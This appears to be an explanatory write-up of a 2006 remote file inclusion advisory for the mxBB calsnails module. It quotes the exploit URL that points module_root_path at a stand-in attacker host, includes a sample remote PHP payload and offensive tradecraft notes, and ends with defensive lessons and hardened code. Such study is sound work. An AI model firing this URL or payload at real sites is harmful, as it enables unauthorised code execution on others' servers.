mxBB Module calsnails 1.06 - mx_common.php File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in the "calsnails" module version 1.06 for mxBB. The vulnerability allows an attacker to include and execute arbitrary PHP code hosted on a remote server by manipulating the module_root_path parameter.
Simple technical breakdown
The core of the vulnerability lies in how the mx_common.php file handles the module_root_path variable. It uses this variable to construct a path to a configuration file (cal_settings.php). However, because the input for module_root_path is not properly sanitized, an attacker can provide a URL pointing to a remote PHP file. When the server attempts to include this remote file, it effectively executes the attacker's code.
Complete code and payload walkthrough
The exploit paper itself is very concise and doesn't contain extensive code. However, it points to the vulnerable line and provides an example exploit URL.
Vulnerable Code Snippet:
include_once($module_root_path . 'includes/cal_settings.'.$phpEx);
- $module_root_path: This variable is intended to hold the root path of the module. In the context of the exploit, this is the user-controlled input.
- 'includes/cal_settings.': This is a static string that forms part of the path to a configuration file.
- $phpEx: This is a PHP variable that typically holds the file extension for PHP files (e.g., .php).
- include_once(): This PHP function includes and evaluates the specified file. If the file has already been included, it will not be included again.
Exploit URL Example:
http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?
- http://[site]/[path]/includes/mx_common.php: This is the target URL, pointing to the vulnerable script within the mxBB installation.
- ?module_root_path=http://Y0urSh3LL?: This is the crucial part.
- module_root_path=: This parameter is passed to mx_common.php.
- http://Y0urSh3LL?: This is the attacker-controlled value. When this is concatenated with 'includes/cal_settings.'.$phpEx, the resulting string becomes http://Y0urSh3LL?includes/cal_settings.php.
- The include_once() function will then attempt to fetch and execute http://Y0urSh3LL?includes/cal_settings.php. If Y0urSh3LL is a server controlled by the attacker and hosts a PHP file named includes/cal_settings.php (or any file that the attacker wants to execute), that code will be executed on the target server. The trailing ? in Y0urSh3LL? is likely there to prevent issues if Y0urSh3LL is a domain name without a trailing slash, ensuring the path is correctly interpreted.
Payload Segment Explanation:
The paper doesn't provide explicit shellcode bytes. The "payload" in this context is the remote PHP file that the attacker hosts. This remote file would contain the malicious PHP code intended to be executed on the target server. For example, a simple remote payload could be:
<?php
// This is the content of the remote file hosted by the attacker
// For example, it could be named 'shell.php' and hosted at http://Y0urSh3LL/shell.php
echo "<h1>Hacked!</h1>";
phpinfo(); // Or any other command to execute
?>
When the vulnerable server includes this, the echo and phpinfo() functions would execute on the target server.
Code Fragment/Block -> Practical Purpose Mapping:
- include_once($module_root_path . 'includes/cal_settings.'.$phpEx); -> Vulnerable Inclusion Logic: This line attempts to include a configuration file. By controlling $module_root_path, an attacker can force it to include a remote file instead of a local one, leading to Remote File Inclusion.
- module_root_path=http://Y0urSh3LL? -> RFI Trigger: This URL parameter injection is the mechanism to supply the attacker's controlled remote file path.
Practical details for offensive operations teams
- Required Access Level: Low. This is a web application vulnerability, exploitable via HTTP requests. No prior authentication or local access is typically required.
- Lab Preconditions:
- A target mxBB installation (version 1.06 or vulnerable to this specific module).
- The "calsnails" module installed and enabled.
- The target server must have PHP configured to allow remote file inclusion (allow_url_fopen = On in php.ini). This is a common but not universal configuration.
- An attacker-controlled web server capable of hosting a malicious PHP file.
- Tooling Assumptions:
- A web browser for manual testing or reconnaissance.
- A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify HTTP requests.
- A simple HTTP server (e.g., Python's http.server, netcat) to host the attacker's payload.
- A script (e.g., Python with the requests library) for automated exploitation.
- Execution Pitfalls:
- allow_url_fopen disabled: If allow_url_fopen is Off in the target server's php.ini, RFI will not work. The server will not be able to fetch remote URLs.
- Incorrect phpEx: If the $phpEx variable is not set to .php or is manipulated, the inclusion might fail or point to an incorrect file. However, in most default PHP configurations, $phpEx is '.php'.
- Firewall/Network Restrictions: The target server might have outbound firewall rules preventing it from connecting to the attacker's hosting server.
- URL Encoding: Special characters in the attacker's URL might need proper URL encoding.
- Payload Hosting: The attacker's server must be accessible from the target server.
- Module Path Mismatch: If the module_root_path is expected to be relative, or if the structure includes/cal_settings.php is not found at the root of the provided URL, the exploit may fail. The exploit URL http://Y0urSh3LL? implies that Y0urSh3LL itself is the base for the inclusion, and the vulnerable script appends the rest.
- Tradecraft Considerations:
- Reconnaissance: Identify the mxBB version and installed modules. Look for the calsnails module.
- Vulnerability Scanning: Automated scanners might detect this if they check for RFI vulnerabilities.
- Payload Staging: Prepare a simple, non-intrusive payload first (e.g., one that just echoes a unique string) to confirm the RFI. Then, deploy more sophisticated payloads.
- Obfuscation: For more advanced engagements, obfuscating the remote payload or the URL might be considered, though for this specific RFI, the primary mechanism is straightforward.
- Post-Exploitation: Once code execution is achieved, the next steps would involve privilege escalation, lateral movement, or data exfiltration, depending on the engagement objectives.
Where this was used and when
- Context: This vulnerability was discovered and published in 2006. It targets web applications built with mxBB, a content management system popular around that time. The "calsnails" module was a specific add-on for mxBB.
- Approximate Years: The exploit was published on 2006-11-17. Therefore, its active exploitation period would likely have been from late 2006 onwards, until mxBB and its vulnerable modules were patched or phased out.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file paths or dynamic code execution. Always sanitize and validate such inputs rigorously.
- Secure Configuration: Ensure allow_url_fopen is disabled in php.ini unless absolutely necessary for legitimate functionality, and even then, implement strict controls.
- Dependency Management: Keep all web application components, including modules and plugins, up-to-date. Regularly audit installed modules for known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns in HTTP requests.
- Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.
- Code Review: Regularly review custom and third-party code for insecure practices like dynamic file inclusion with untrusted input.
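The following is an added example, not code from the paper or the calsnails module, showing how the vulnerable include_once line could be hardened along the lines above: a scheme check that rejects URLs and stream wrappers, an allow-list of module directory names, and a realpath containment check. The variable names $module_root_path and $phpEx and the file includes/cal_settings.php come from the paper; the function name resolve_module_settings, the $base_dir layout and the ['calsnails'] allow-list are assumptions made for illustration.

```php
<?php
// Added example, not code from the paper or the calsnails module.
// Hardened replacement for the paper's vulnerable line:
//   include_once($module_root_path . 'includes/cal_settings.'.$phpEx);
// The layout $base_dir/<module>/includes/cal_settings.php and the
// allow-list of module names are assumptions for illustration.

/**
 * Map an untrusted module selector to a settings file under $base_dir.
 * Returns the canonical file path, or null when the value is rejected.
 */
function resolve_module_settings(string $module_root_path, string $base_dir,
                                 string $phpEx, array $allowed_modules): ?string
{
    // 1. Reject anything carrying a scheme (http://, ftp://, php://, data://,
    //    phar:// ...). This stops the RFI vector even if allow_url_include is On.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $module_root_path)) {
        return null;
    }
    // 2. Accept only a bare directory name from a fixed allow-list, so
    //    traversal sequences such as ../ cannot appear at all.
    $name = rtrim($module_root_path, '/');
    if (!in_array($name, $allowed_modules, true)) {
        return null;
    }
    // 3. Canonicalise and confirm the file still lies inside $base_dir.
    //    $phpEx is the extension without the dot; the literal supplies the dot.
    $real_base = realpath($base_dir);
    if ($real_base === false) {
        return null;
    }
    $candidate = realpath($real_base . '/' . $name . '/includes/cal_settings.' . $phpEx);
    if ($candidate === false || strpos($candidate, $real_base . '/') !== 0) {
        return null;
    }
    return $candidate;
}

// The parameter is still read from the query string, but it is now a
// selector validated against the allow-list, never used as a raw path.
$module_root_path = (string)($_GET['module_root_path'] ?? '');
$settings = resolve_module_settings($module_root_path, __DIR__ . '/../modules',
                                    $phpEx ?? 'php', ['calsnails']);
if ($settings === null) {
    http_response_code(400);
    exit('Invalid module_root_path');
}
include_once $settings;
// Defence in depth: also set allow_url_include=Off and allow_url_fopen=Off in
// php.ini; the checks above do not depend on either setting.
```

With this in place the paper's exploit value http://Y0urSh3LL? is rejected at step 1 before any file system or network access occurs, and a traversal value such as ../../ is rejected at step 2 because it is not an allow-listed name.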
ASCII visual (if applicable)
This vulnerability is a direct interaction between the web server and an external resource.
+-----------------+      +---------------------+      +-------------------+
|   Attacker's    |      |  Target Web Server  |      | Target Application|
|     Server      |----->|    (Vulnerable)     |----->| (mxBB calsnails)  |
| (Hosts Payload) |      |                     |      |                   |
+-----------------+      +---------------------+      +-------------------+
         ^                          |
         |                          | HTTP Request (GET)
         |                          | with malicious
         |                          | module_root_path
         |                          v
         |        +-----------------------------------+
         |        | mx_common.php                     |
         |        | include_once($module_root_path .  |
         |        | 'includes/cal_settings.'.$phpEx); |
         |        +-----------------------------------+
         |                          |
         |                          | HTTP Request (GET)
         |                          | to Attacker's Server
         |                          | to fetch remote file
         +--------------------------+
Source references
- Paper ID: 2799
- Paper Title: mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion
- Author: bd0rk
- Published: 2006-11-17
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2799
- Raw URL: https://www.exploit-db.com/raw/2799
Original Exploit-DB Content (Verbatim)
##################################################################
# #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
# #
# Bugfounder: bd0rk || SOH-Crew #
# #
# Website: www.soh-crew.it.tt #
# #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke #
# #
##################################################################
Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21
Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);
[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?
# milw0rm.com [2006-11-17]